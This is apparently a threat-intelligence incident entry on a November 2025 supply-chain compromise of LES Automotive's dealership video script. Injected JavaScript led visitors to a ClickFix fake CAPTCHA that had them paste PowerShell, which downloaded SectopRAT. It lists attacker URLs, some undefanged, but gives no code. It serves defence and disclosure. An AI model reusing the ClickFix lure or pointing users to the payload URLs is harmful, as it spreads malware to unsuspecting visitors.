Cyber Incident Victim: LES Automotive
Date:
Nov 2025
Location:
United States of America
Summary
A supply chain compromise of a third‑party video service used by auto dealerships led to the injection of malicious JavaScript that redirected visitors to a ClickFix page prompting them to run PowerShell commands. The commands downloaded and executed SectopRAT, a remote access trojan, affecting over 100 dealerships before the service provider, LES Automotive, remediated the issue.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
The compromise began when threat actors infiltrated LES Automotive, a third‑party video service used by more than one hundred auto dealerships, and injected malicious JavaScript into the shared file les_video_srp.js hosted at https://www.idostream[.]com/member/les_video_srp.js. When a dealership website loaded this script, it dynamically created another script element that pointed to https://security-confirmation.help/captchav2, which in turn redirected visitors to a ClickFix page at https://www.deliveryoka.com/webservice_ionic/captchav2.html?us. The ClickFix page displayed a fake reCAPTCHA prompt instructing users to click a checkbox to prove they were not a robot, after which it placed a PowerShell command into the clipboard and directed the user to open the Windows Run dialog, paste the command, and execute it. The JavaScript responsible for copying the command contained a Russian comment reading “Очистите предыдущий таймаут,” meaning “Clear the previous timeout,” and researchers noted that victims were often served a benign version of the script, indicating the injection was likely performed dynamically.
Executing the clipboard‑delivered PowerShell command initiated a chain of downloads: first contacting https://bitly.cx/UnluS, which redirected to https://main-login.sbs/maison/tree, then retrieving a second Bitly link that pointed to https://main-login.sbs/fernandino/brend. This file was saved as Lancaster.zip in the user’s temporary folder, extracted, and the executable zkwindow.exe was launched. Analysis of the extracted file in a Triage sandbox identified the payload as SectopRAT, a remote access trojan, with a perfect threat score of ten out of ten. The attack thus delivered SectopRAT to any visitor who completed the ClickFix steps, potentially compromising the systems of dealership customers and employees across the more than one hundred affected dealerships. The compromise of LES Automotive was identified by security researchers, and the provider subsequently remediated the issue, removing the malicious code from les_video_srp.js and restoring the legitimate version of the shared video service. Indicators of compromise associated with the campaign include the domains security-confirmation[.]help, deliveryoka[.]com, bitly[.]cx, and main-login[.]sbs, along with the specific file hashes and URLs detailed in the public reports.